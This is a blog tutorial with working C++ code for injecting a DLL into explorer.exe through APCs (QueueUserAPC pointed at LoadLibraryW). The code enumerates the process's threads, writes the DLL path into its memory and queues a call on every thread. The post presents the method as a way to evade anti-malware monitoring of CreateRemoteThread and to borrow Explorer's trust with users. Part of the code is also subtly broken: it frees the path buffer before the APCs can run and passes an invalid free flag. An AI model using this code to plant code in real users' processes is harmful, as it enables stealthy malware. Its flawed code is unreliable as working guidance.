Injecting a DLL without a Remote Thread

March 14, 2017

no comments

A well-known technique for injecting a DLL into another process involves using the CreateRemoteThread(Ex) function to create a thread in another process and point the thread function to the LoadLibraryA or LoadLibraryW, since these functions have the same signature (on the binary level) as a thread function. Before calling CreateRemoteThread, the caller uses VirtualAllocEx to allocate some memory to hold the path to the DLL. This technique is simple and reliable, but has a couple of drawbacks:

  1. 1. The target process must be opened with a relatively broad access mask that includes PROCESS_CREATE_THREAD.
  2. 2. Anti-malware agents typically watch closely CreateRemoteThread attempts and will be alerted to it, since most processes should not need such an operation. The canonical scenario for CreateRemoteThread is for a debugger to inject a thread into its debuggee and then trigger a breakpoint, forcing a break-in into the process.

Another technique that could be used to inject a DLL without creating any remote thread is to use an Asynchronous Procedure Calls (APC). An APC is an object that wraps a function that is targeted at a particular thread. If we can somehow attach an APC to a thread running in the target process, we may be able to “force” that thread to load our DLL. There’s one snag with this approach, which we’ll get to in a moment.

Let’s say we want to inject our DLL into Explorer.exe, since it’s likely to exist, and code running from explorer is somewhat “trusted” by users. First, we need to locate Explorer, and then decide to which thread to attach our APC. Although we can try picking a random thread inside explorer, we can even do this to all threads in explorer. Why? Because a user mode APC (which is what we can use in user mode) cannot force the target to execute it (that’s the “snag”). For a thread to execute its APCs, it must enter an “alertable” state, which can be achieved with several functions: SleepEx, WaitForSingleObjectEx, WaitForMultipleObjectsEx and MsgWaitForMultipleObjectsEx. The waiting in these functions can be configured to be alertable, so that APCs are able to run.

Let’s start by searching for a target process given its EXE name and getting back its ID and a list of threads:

bool FindProcess(PCWSTR exeName, DWORD& pid, vector<DWORD>& tids) {
    auto hSnapshot = ::CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS | TH32CS_SNAPTHREAD, 0);
    if (hSnapshot == INVALID_HANDLE_VALUE)
        return false;

    pid = 0;

    PROCESSENTRY32 pe = { sizeof(pe) };
    if (::Process32First(hSnapshot, &pe)) {
        do {
            if (_wcsicmp(pe.szExeFile, exeName) == 0) {
                pid = pe.th32ProcessID;
                THREADENTRY32 te = { sizeof(te) };
                if (::Thread32First(hSnapshot, &te)) {
                    do {
                        if (te.th32OwnerProcessID == pid) {
                            tids.push_back(te.th32ThreadID);
                        }
                    } while (::Thread32Next(hSnapshot, &te));
                }
                break;
            }
        } while (::Process32Next(hSnapshot, &pe));
    }

    ::CloseHandle(hSnapshot);
    return pid > 0 && !tids.empty();
}

The function uses the toolhelp functions to enumerate processes and threads, returning a process ID and a vector of thread IDs.

Now that have a process and its threads, we can try to inject an APC to each thread using QueueUserAPC. The first step is opening a process handle capable of writing to the target process address space:

DWORD pid;
vector<DWORD> tids;
if (FindProcess(L"explorer.exe", pid, tids)) {
    HANDLE hProcess = ::OpenProcess(PROCESS_VM_WRITE | PROCESS_VM_OPERATION, FALSE, pid);

Notice that PROCESS_CREATE_THREAD access right is not required. If the handle turns back ok, we can move to the real work. Next, we allocate a buffer inside the process and copy our DLL’s full path into the buffer:

auto p = ::VirtualAllocEx(hProcess, nullptr, 1 << 12, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
wchar_t buffer[] = L"g:\\temp\\MyLibrary.Dll";
::WriteProcessMemory(hProcess, p, buffer, sizeof(buffer), nullptr);
  1. Now we can loop on all threads, obtain a handle for each and queue an APC:
    for (const auto& tid : tids) {
        HANDLE hThread = ::OpenThread(THREAD_SET_CONTEXT, FALSE, tid);
        if (hThread) {
            ::QueueUserAPC((PAPCFUNC)::GetProcAddress(GetModuleHandle(L"kernel32"), "LoadLibraryW"), hThread, (ULONG_PTR)p);
        }
    }
    ::VirtualFreeEx(hProcess, p, 0, MEM_RELEASE | MEM_DECOMMIT);

(of course we should close each thread handle and finally the process handle as well).

We target the APC to the LoadLibraryW function, because again, it’s prototype is almost the same as any APC – the only real difference is the APC function does not return anything, but we don’t care. Once our DLL loads, its DllMain can do anything, like create a local thread and do whatever work we want Explorer.

Targeting the APC to all threads increases the chance of the DLL loading, because it’s likely some thread will enter an alertable wait state. Since a DLL cannot be loaded multiple times, there’s no harm in that. Here’s my DLL inside Explorer.Exe:

image

Add comment
facebook linkedin twitter email

Leave a Reply

Your email address will not be published.

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>

*